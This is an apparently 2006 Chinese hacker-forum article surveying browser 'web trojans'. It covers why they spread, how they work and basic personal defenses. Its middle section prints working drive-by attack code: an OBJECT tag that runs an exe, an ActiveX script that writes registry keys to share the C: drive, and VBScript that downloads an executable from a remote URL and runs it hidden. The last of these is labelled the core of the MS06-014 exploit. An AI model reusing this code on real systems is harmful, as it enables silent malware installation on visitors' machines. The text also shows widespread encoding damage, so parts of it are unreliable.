網(wǎng)頁(yè)木馬綜述
文章作者:金州
信息來源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.)
網(wǎng)頁(yè)木馬綜述
前言���,又8月份了�。又該寫東西�,一直寫不出好的東西����。大約還是天分不足�,努力不夠��。雖然才疏學(xué)淺���,還是堅(jiān)持盡量一個(gè)月弄出點(diǎn)什么��,算是學(xué)習(xí)筆記了��?����?纯瓷洗螌懗鰜頄|西是6月多����,一個(gè)多月了���。不過寫出來更失望���。仿佛什么都沒有學(xué)會(huì),常常看著自己寫得垃圾東西不知所措���。而時(shí)間流走了����,運(yùn)命唯所遇��。東西比想象中的難學(xué)���,生活比想象中的艱辛��。希望自己有一天能真的寫出對(duì)自己對(duì)別人有幫助的東西�。祝福父母弟弟愛人所有的朋友�����,所有善良的人����。
金州(EST.VIP)2006.8.4
一,總論
二�����,網(wǎng)頁(yè)木馬的基本工作流程。
三�����,網(wǎng)頁(yè)木馬的基本防范�。
四��,參考文獻(xiàn)
一�,總論
網(wǎng)頁(yè)木馬一直是國(guó)內(nèi)網(wǎng)絡(luò)流行的東西。(金州注釋����,據(jù)朋友說,這種東西在國(guó)外并不流行�。)之所以比較流行金州覺得有如下原因,
1.網(wǎng)頁(yè)木馬在各種網(wǎng)絡(luò)威脅中技術(shù)含量相對(duì)來說屬于較低的類型����。這就意味著他便于制作推廣。
2.免費(fèi)空間的增多和個(gè)人建站的流行�,給網(wǎng)頁(yè)木馬客觀附帶的造就了很大的生存空間。
3.國(guó)內(nèi)上網(wǎng)人數(shù)的奇跡般的遞增�����,使網(wǎng)頁(yè)木馬的受眾層增多。
4.國(guó)內(nèi)上網(wǎng)人群目前普遍安全意識(shí)較低��,很多人使用盜版系統(tǒng)�����,有時(shí)候無(wú)法更新補(bǔ)丁或及時(shí)更新補(bǔ)丁����,(金州注釋,國(guó)內(nèi)網(wǎng)頁(yè)木馬大多是針對(duì)windows系統(tǒng)的ie的)使針對(duì)ie漏洞型的網(wǎng)頁(yè)木馬生存時(shí)間延長(zhǎng)��。
5.網(wǎng)頁(yè)木馬見效快�,(金州注釋,這個(gè)并不是證明網(wǎng)頁(yè)木馬效率高�,而是因?yàn)槭鼙姸啵?br>6.很多間接推動(dòng)網(wǎng)絡(luò)安全,擅長(zhǎng)腳本技術(shù)的人很及時(shí)地推出了眾多簡(jiǎn)便式的網(wǎng)頁(yè)木馬生成器或網(wǎng)頁(yè)木馬程式�����。此中icefox(冰狐浪子EST)��,LCX(haiyangtop.126.com)等對(duì)于國(guó)內(nèi)網(wǎng)頁(yè)木馬的流行起到了奠基的作用���。
以上jinzhou只是淺顯說到網(wǎng)頁(yè)木馬之所以流行的原因���。其中也可看到網(wǎng)頁(yè)木馬目前來說還是具有一定優(yōu)點(diǎn)的���,尤其是制作操作簡(jiǎn)單。和相對(duì)收效快的特點(diǎn)����。下面簡(jiǎn)單說說網(wǎng)頁(yè)木馬的一些不足����。
1.很多網(wǎng)頁(yè)木馬針對(duì)的是特有的ie漏洞。(金州注釋�,關(guān)于詳細(xì)情形,以下論述)一旦漏洞補(bǔ)上����,網(wǎng)頁(yè)木馬失效。ie的漏洞相對(duì)系統(tǒng)的核心漏洞來說���,修補(bǔ)比較容易���。(金州注釋,何況有些人根本就不是用ie和ie內(nèi)核瀏覽器)
2.網(wǎng)頁(yè)木馬的絕對(duì)命中率較低���,一般來說10%就很不錯(cuò)了���。(金州注釋��,這由多種原因造成�����,比如受眾方做了其他限制�,一些殺毒軟件或監(jiān)控軟件的干擾和警示���,對(duì)相關(guān)運(yùn)行網(wǎng)頁(yè)木馬的一些控件的解除��,比如更名或刪除debug和wsh等會(huì)使一些網(wǎng)頁(yè)木馬無(wú)法成功�����,一些安全監(jiān)視工具會(huì)提示異常運(yùn)行等等)
3.網(wǎng)頁(yè)木馬沒有固定目標(biāo)��。缺乏針對(duì)性�����,一定意義上�����,它只是等著別人來中����,它不能主動(dòng)地選擇受眾。
4.網(wǎng)頁(yè)木馬很難感染一些重要部門的重要機(jī)器而不被發(fā)現(xiàn)��。網(wǎng)頁(yè)木馬常常無(wú)力顧及木馬被下載后的深入隱藏�。很容易被一些有基礎(chǔ)安全知識(shí)的人查獲。
5.因?yàn)榫W(wǎng)頁(yè)木馬一旦應(yīng)用����,即等于間接性的公開了腳本�,具有時(shí)效性。幾乎不可能有永遠(yuǎn)好使的網(wǎng)頁(yè)木馬��,(金州注釋���,指的是網(wǎng)頁(yè)木馬的流程)�,而一些rootkit甚至能隱藏10年�����。網(wǎng)頁(yè)木馬類流行很少過年。
目前網(wǎng)頁(yè)木馬的主要危害�,金州覺得主要是利用網(wǎng)頁(yè)木馬控制大量機(jī)器,間接形成僵尸網(wǎng)絡(luò)進(jìn)行利用tcp/ip協(xié)議漏洞的DOS/DDOS攻擊�����。和一些其他的商業(yè)非法活動(dòng)�,例如投票,發(fā)布商業(yè)廣告���,作為跳板的一些滲透等�����。很多時(shí)候能造成極大的危害��。也就是說網(wǎng)頁(yè)木馬的利用趨勢(shì)已經(jīng)由開始的惡作劇性的對(duì)某些機(jī)器的窺視變成了利用受眾機(jī)器形成一種力量轉(zhuǎn)做為攻擊和謀求商業(yè)利益的武器���。
二,網(wǎng)頁(yè)木馬的基本工作流程�����。
網(wǎng)頁(yè)木馬的基本工作流程�,大致是��,
1.受眾打開含有網(wǎng)頁(yè)木馬代碼的網(wǎng)頁(yè)����,
2.網(wǎng)頁(yè)木馬利用ie漏洞或者一些腳本功能下載一個(gè)可執(zhí)行文件或腳本�。(金州注釋,很多時(shí)候根據(jù)需要附帶同時(shí)紀(jì)錄用戶ip)
如以下代碼
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"jinzhou.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>金州提示�,網(wǎng)頁(yè)加載中,請(qǐng)稍后....正在運(yùn)行木馬</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
保存為jinzhou.html然后在同目錄下放一個(gè)exe文件�����,起名為jinzhou.exe.運(yùn)行jinzhou.html,會(huì)出現(xiàn)金州提示�,網(wǎng)頁(yè)加載中,請(qǐng)稍后....正在運(yùn)行木馬���,然后那個(gè)jinzhou.exe就會(huì)運(yùn)行。(金州注釋�,本地和遠(yuǎn)程都會(huì)提示,一般稍有一點(diǎn)安全意識(shí)的都不會(huì)中���,不過事實(shí)上這種方法現(xiàn)在仍然會(huì)使很多極其不小心的人上當(dāng)�。此流程比較經(jīng)典����。)
< script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
調(diào)用本地控件寫注冊(cè)表的代碼��。此代碼是共享c�����,當(dāng)然你可以共享任何盤���。
<script language="vbscript">
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://www./jinzhou.EXE", false
xmlHTTP.send
contents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "c:\\jinzhou.exe", adSaveCreateOverwrite
</script>
上面以前的Adodb.Stream文件下載代碼核心部分。
<script language="VBScript">
on error resume next
dl = "http://www./jinzhou.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
以上MS06014利用代碼核心�。
綜合以上,大致可以看出�,網(wǎng)頁(yè)木馬的基礎(chǔ)就是非法讓受眾在不知覺得情況下改變用戶配置或下載運(yùn)行非法程序以非法謀取自己的非法利益。不在一一舉例���。在網(wǎng)頁(yè)木馬的歷史上影響重大的還有MHT漏洞即Windows在處理畸形MHTML���,能執(zhí)行任意遠(yuǎn)程腳本代碼。(金州注釋�����,國(guó)內(nèi)一般稱為chm木馬。冰狐浪子對(duì)此有很詳細(xì)的文章���。)木馬有2個(gè)組成部分����,一個(gè)是利用MHT漏洞的惡意網(wǎng)頁(yè)代碼����,另一個(gè)是包含惡意程序的CHM文件。把它們都放到網(wǎng)站上�����,用戶訪問惡意網(wǎng)頁(yè)時(shí)��,會(huì)在沒有任何安全提示的情況下�����,自動(dòng)下載遠(yuǎn)程CHM文件中的程序并運(yùn)行��。HHCTRL漏洞���,HTML幫助ActiveX控件存在問題,利用它可以進(jìn)行跨安全區(qū)域腳本執(zhí)行,從而可以下載并自動(dòng)執(zhí)行遠(yuǎn)程惡意程序����。HTA漏洞,IE瀏覽器允許HTA類型的代碼以全部權(quán)限運(yùn)行����。遠(yuǎn)程HTA代碼可以調(diào)用Wscript.Shell等控件執(zhí)行用戶本地的任意程序,iframe溢出等等��。網(wǎng)上相關(guān)資料較多����。不再贅述?��?傮w來說�,網(wǎng)頁(yè)木馬的制作并不復(fù)雜�����,它的重點(diǎn)往往會(huì)在加密和輔助的隱藏上����。
三,網(wǎng)頁(yè)木馬的基本防范
網(wǎng)頁(yè)木馬的基本防范大概如下幾點(diǎn),(金州注釋�,針對(duì)個(gè)人的,網(wǎng)頁(yè)木馬絕大多數(shù)受眾都是個(gè)人���。)
1.�����,卸載或者改名whs腳本宿主��。刪除注冊(cè)表{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}
{0D43FE01-F093-11CF-8940-00A0C9054228}��,運(yùn)行regsvr32 scrrun.dll /u 卸載控件等��。
2.在我的電腦����,屬性��,高級(jí)���,環(huán)境變量中�����,PATHEXT刪除一些危險(xiǎn)的變量�,如vbs,vbe,js等�����?�;蛟谖募A選項(xiàng)��,文件類型中更改vbs����,Windows Script Host等的關(guān)聯(lián)。
3.禁用ftp�����,tftp,或改變端口�。等防止網(wǎng)頁(yè)木馬的利用途徑。找到C:\windows\system32\drivers\Etc 記事本打開其中的services文件會(huì)看到一些對(duì)應(yīng)的端口��,改一下保存就行了�。改名debug等。
4.最好安裝殺毒軟件����。打開實(shí)時(shí)監(jiān)控�,一般網(wǎng)頁(yè)木馬殺毒還是會(huì)報(bào)警的����。
5.提高警惕性,一旦發(fā)現(xiàn)ie運(yùn)行不正常���,比如卡或者無(wú)故死掉���,或者一場(chǎng)閃出,養(yǎng)成立刻檢查系統(tǒng)的習(xí)慣���。
6.多注意查看網(wǎng)頁(yè)源代碼��,無(wú)論多么高明的網(wǎng)頁(yè)木馬���,在源代碼中也可以看出端倪。
7.注意更新系統(tǒng)補(bǔ)丁����。
等等。
(金州注釋�����,以上為個(gè)人見解,技術(shù)日新月異��,不一定有效全面��,個(gè)人愚笨���,在學(xué)習(xí)中,不足之處見諒��。另�����,文中一些代碼可能會(huì)被殺毒報(bào)警���,無(wú)害���。)
四,參考文獻(xiàn)
邪惡八進(jìn)制信息安全團(tuán)隊(duì)技術(shù)論壇(http://forum./)
lcx海陽(yáng)頂端資料(http:///safety/defaultx.asp)
金州 2006.8.4 [est_vip]
描述:pdf文檔
附件:  網(wǎng)頁(yè)木馬綜述.rar (16 K) 下載次數(shù):71
|
